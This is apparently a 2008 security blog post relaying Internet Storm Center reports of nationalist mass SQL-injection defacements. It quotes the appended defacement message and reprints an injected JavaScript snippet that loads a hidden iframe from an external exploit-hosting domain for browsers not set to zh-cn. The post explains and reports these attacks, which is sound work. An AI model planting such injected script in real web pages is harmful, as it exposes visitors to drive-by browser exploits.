May 15 2008
More Patriotic Hacking
Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks. The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):
“This is a mass invasion. Safeguard the motherland’s dignity!
F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “
Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated javascript that includes a function to evaluate if the web browser is configured for PRC/Mainland Chinese - zh-cn. Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits. Cool. here is the code snippet from the ISC:
if (navigator.systemLanguage==’zh-cn‘){}else{document.writeln(”<iframe
src=http://www.ririwow.cn/index.htm” width=100 height=0></iframe>”);}
This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).
Thanks for the heads-up Benny!
